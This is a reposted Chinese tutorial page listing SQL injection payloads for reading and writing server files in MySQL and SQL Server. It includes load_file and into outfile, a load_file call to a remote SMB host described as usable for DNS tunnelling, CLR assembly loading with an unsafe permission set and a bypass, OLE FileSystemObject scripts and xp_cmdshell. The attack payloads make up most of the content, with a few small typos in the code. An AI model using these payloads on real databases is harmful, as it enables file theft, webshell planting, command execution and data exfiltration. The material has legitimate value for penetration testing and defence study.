广告

扫码关注官方微信

扫码下载APP
返回顶部
首页 > 资讯 > 数据库 >SQL注入中文件读写的方法有哪些
  • 124

0
分享到

SQL注入中文件读写的方法有哪些

2024-04-02 19:04:59 124人浏览 独家记忆
摘要

这篇文章主要介绍了sql注入中文件读写的方法有哪些,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。一、MySQL读文件常见的读文件,可以用16

这篇文章主要介绍了sql注入中文件读写的方法有哪些,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。

一、MySQL

读文件

常见的读文件,可以用16进制代替字符串

select load_file('c:/boot.ini')
select load_file(0x633a2f626f6f742e696e69)
select load_file('//ecma.io/1.txt') # smb协议
select load_file('\\\\ecma.io\\1.txt') # 可用于DNS隧道

写文件

我暂时已知l两种写文件的方式

select 0x313233 into outfile 'D:/1.txt'
select 0x313233 into dumpfile 'D:/1.txt'

二、 SQL Server

读文件

1. BULK INSERT

create table result(res varchar(8000));
bulk insert result from 'd:/1.txt';

2. CLR集成

// 开启CLR集成
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'clr enabled',1
reconfigure
create assembly sqb from 'd:\1.exe' with permission_set=unsafe

上面一句可以利用create assembly函数从远程服务器加载任何.net二进制文件到数据库中;但是他会验证是否为合法.NET程序,导致失败,下面是读取方式

select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files

绕过,首先加载一个有效的.NET的二进制文件,然后追加文件即可,下面是绕过方法。

create assembly sqb from 'd:\net.exe';
alter assembly sqb add file from 'd:\1.txt'
alter assembly sqb add file from 'd:\notnet.exe'

3. Script.FileSystemObject

# 开启Ole Automation Procedures
 
sp_configure 'show advanced options',1;
RECONFIGURE;
sp_configure 'Ole Automation Procedures',1;
RECONFIGURE;
declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1
exec @ret = sp_onmethod @f, 'readline', @line out
while(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end

写文件

1. Script.FileSystemObject

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1
exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'

2. BCP复制文件(测试失败,无bcp.exe)

c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"

3. xp_cmdshell

exec xp_cmdshell 'echo test>d:\1.txt'

三、Oracle

pass,oracle太坑了~~~几乎都受到PL/SQL的限制,暂时不讨论

感谢你能够认真阅读完这篇文章,希望小编分享的“SQL注入中文件读写的方法有哪些”这篇文章对大家有帮助,同时也希望大家多多支持编程网,关注编程网数据库频道,更多相关知识等着你来学习!

您可能感兴趣的文档:
点击免费下载>>软考高级考试备考技巧/历年真题/备考精华资料

--结束END--

本文标题: SQL注入中文件读写的方法有哪些

本文链接: https://www.lsjlt.com/news/57296.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
去做题
猜你喜欢
  • SQL注入中文件读写的方法有哪些
    这篇文章主要介绍了SQL注入中文件读写的方法有哪些,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。一、MySQL读文件常见的读文件,可以用16...
    99+
    2022-10-18
  • sql注入写文件都有哪些函数
    sql注入写文件的函数有:文件写入使用into outfile函数,例如:union select 1,"",3,4,5 into outfile 'C:/Inetpub/wwwroot/cc.php'...
    99+
    2022-10-08
  • python文件读写的方法有哪些
    Python文件读写的方法有以下几种:1. 使用open()函数打开文件,并通过read()方法读取文件内容。```pythonfi...
    99+
    2023-09-13
    python
  • 文件写入的方法有哪些
    这篇文章主要讲解了“文件写入的方法有哪些”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“文件写入的方法有哪些”吧!0.什么是流Java 中的“流”是一种抽象的概念,也是一种比喻,就好比水流一样...
    99+
    2023-06-15
  • C#读取写入文件的方式有哪些
    这篇“C#读取写入文件的方式有哪些”文章的知识点大部分人都不太理解,所以小编给大家总结了以下内容,内容详细,步骤清晰,具有一定的借鉴价值,希望大家阅读完这篇文章能有所收获,下面我们一起来看看这篇“C#读取写入文件的方式有哪些”文章吧。1:二...
    99+
    2023-07-02
  • php sql注入的方法有哪些
    SQL注入是一种常见的网络安全漏洞,攻击者利用此漏洞可以执行恶意SQL语句,从而获取敏感数据或者对数据库进行修改。以下是一些常见的P...
    99+
    2023-08-23
    php sql
  • Nodejs读写文件的操作方法有哪些
    这篇“Nodejs读写文件的操作方法有哪些”文章的知识点大部分人都不太理解,所以小编给大家总结了以下内容,内容详细,步骤清晰,具有一定的借鉴价值,希望大家阅读完这篇文章能有所收获,下面我们一起来看看这篇“Nodejs读写文件的操作方法有哪些...
    99+
    2023-07-04
  • Python中的文件读写方式有哪些?
    Python中的文件读写方式有多种,可以根据实际需要选择不同的方式。下面将介绍几种常用的文件读写方式,并给出代码示例。使用open()函数open()函数是Python提供的用于打开文件的内置函数。它可以接受文件名和打开模式作为参数,并返回...
    99+
    2023-10-22
    文件
  • 防范sql注入的方法有哪些
    这篇文章主要介绍防范sql注入的方法有哪些,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!防止SQL注入的方式有:执行sql语句时使用addslashes进行sql语句转换,过滤掉sq...
    99+
    2022-10-18
  • 防止SQL注入的方法有哪些
    防止SQL注入的方法有:采用PreparedStatement进行预编译,sql语句在执行的过程中效率比Statement要高,例如:String sql = "select* from users where...
    99+
    2022-10-21
  • SQL注入的防御方法有哪些
    这篇文章主要介绍了SQL注入的防御方法有哪些的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇SQL注入的防御方法有哪些文章都会有所收获,下面我们一起来看看吧。限制数据类型在传入参数的地方限制参数的类型,比如整型 ...
    99+
    2023-07-02
  • Python读写EXCEL文件常用方法有哪些
    本篇文章给大家分享的是有关Python读写EXCEL文件常用方法有哪些,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。python读写excel...
    99+
    2022-10-19
  • php写入文件内容的方法有哪些
    在PHP中,可以使用以下方法来写入文件内容:1. 使用`file_put_contents()`函数:该函数将一个字符串写入文件中。如果文件不存在,则创建新文件。如果文件已存在,则覆盖文件内容。示例代码如下:```php$file = ...
    99+
    2023-08-11
    php
  • java防止sql注入的方法有哪些
    java防止sql注入的方法有:采用PreparedStatement进行预编译,sql语句在执行的过程中效率比Statement要高,例如:String sql = "select* from users wher&#...
    99+
    2022-10-07
  • php防止sql注入的方法有哪些
    1. 使用预处理语句和绑定参数:使用PDO或mysqli扩展来执行SQL查询,使用预处理语句和绑定参数的方式来防止SQL注入。预处理...
    99+
    2023-08-23
    php sql
  • sql注入的方式有哪些
    这篇文章主要讲解了“sql注入的方式有哪些”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“sql注入的方式有哪些”吧! sql注入...
    99+
    2022-10-18
  • c语言文件读写的操作方法有哪些
    本篇内容介绍了“c语言文件读写的操作方法有哪些”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!c语言的文件读写操作:1、用fgetc()和fp...
    99+
    2023-07-04
  • Go语言中JSON文件的读写操作方法有哪些
    这篇文章主要介绍“Go语言中JSON文件的读写操作方法有哪些”,在日常操作中,相信很多人在Go语言中JSON文件的读写操作方法有哪些问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”Go语言中JSON文件的读写操...
    99+
    2023-07-05
  • Go语言中XML文件的读写操作方法有哪些
    这篇文章主要介绍“Go语言中XML文件的读写操作方法有哪些”的相关知识,小编通过实际案例向大家展示操作过程,操作方法简单快捷,实用性强,希望这篇“Go语言中XML文件的读写操作方法有哪些”文章能帮助大家解决问题。XML(extensible...
    99+
    2023-07-05
  • python把字典写入文件的方法有哪些
    Python有几种方法可以将字典写入文件:1. 使用文件对象的write方法逐行写入字典的键值对。首先将字典转换为字符串格式,然后将...
    99+
    2023-08-08
    python
软考高级职称资格查询
软考职称历年真题下载
软考职称资料下载
热门wiki
近期文章
推荐阅读
热门问答
热门标签
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。

  • 官方手机版

  • 微信公众号

  • 商务合作